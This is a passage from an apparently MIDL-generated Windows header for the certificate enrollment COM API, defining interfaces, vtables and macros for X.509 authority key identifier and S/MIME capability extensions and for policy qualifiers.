        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthorityKeyIdentifier )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionAuthorityKeyIdentifierVtbl;

    interface IX509ExtensionAuthorityKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionAuthorityKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAuthorityKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAuthorityKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAuthorityKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAuthorityKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionAuthorityKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_AuthorityKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AuthorityKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapability_INTERFACE_DEFINED__
#define __ISmimeCapability_INTERFACE_DEFINED__

/* interface ISmimeCapability */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapability;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab319-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapability : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BitCount( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapability * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapability * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapability * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapability * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BitCount )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } ISmimeCapabilityVtbl;

    interface ISmimeCapability
    {
        CONST_VTBL struct ISmimeCapabilityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapability_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapability_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapability_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapability_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapability_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapability_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapability_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapability_Initialize(This,pObjectId,BitCount)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,BitCount) ) 

#define ISmimeCapability_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ISmimeCapability_get_BitCount(This,pValue)	\
    ( (This)->lpVtbl -> get_BitCount(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapability_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapabilities_INTERFACE_DEFINED__
#define __ISmimeCapabilities_INTERFACE_DEFINED__

/* interface ISmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31a-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapabilities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddFromCsp( 
            /* [in] */ __RPC__in_opt ICspInformation *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddAvailableSmimeCapabilities( 
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapabilities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddFromCsp )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ICspInformation *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *AddAvailableSmimeCapabilities )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        END_INTERFACE
    } ISmimeCapabilitiesVtbl;

    interface ISmimeCapabilities
    {
        CONST_VTBL struct ISmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapabilities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISmimeCapabilities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISmimeCapabilities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISmimeCapabilities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISmimeCapabilities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISmimeCapabilities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISmimeCapabilities_AddFromCsp(This,pValue)	\
    ( (This)->lpVtbl -> AddFromCsp(This,pValue) ) 

#define ISmimeCapabilities_AddAvailableSmimeCapabilities(This,MachineContext)	\
    ( (This)->lpVtbl -> AddAvailableSmimeCapabilities(This,MachineContext) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapabilities_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__
#define __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__

/* interface IX509ExtensionSmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31b-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSmimeCapabilities : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSmimeCapabilities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue);
        
        END_INTERFACE
    } IX509ExtensionSmimeCapabilitiesVtbl;

    interface IX509ExtensionSmimeCapabilities
    {
        CONST_VTBL struct IX509ExtensionSmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSmimeCapabilities_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSmimeCapabilities_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSmimeCapabilities_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSmimeCapabilities_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_SmimeCapabilities(This,ppValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0031 */
/* [local] */ 

typedef 
enum PolicyQualifierType
    {
        PolicyQualifierTypeUnknown	= 0,
        PolicyQualifierTypeUrl	= 1,
        PolicyQualifierTypeUserNotice	= 2,
        PolicyQualifierTypeFlags	= 3
    } 	PolicyQualifierType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0031_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0031_v0_0_s_ifspec;

#ifndef __IPolicyQualifier_INTERFACE_DEFINED__
#define __IPolicyQualifier_INTERFACE_DEFINED__

/* interface IPolicyQualifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31c-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifier : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Qualifier( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IPolicyQualifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Qualifier )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IPolicyQualifierVtbl;

    interface IPolicyQualifier
    {
        CONST_VTBL struct IPolicyQualifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifier_GetTypeInfoCount(This,pctinfo)	\
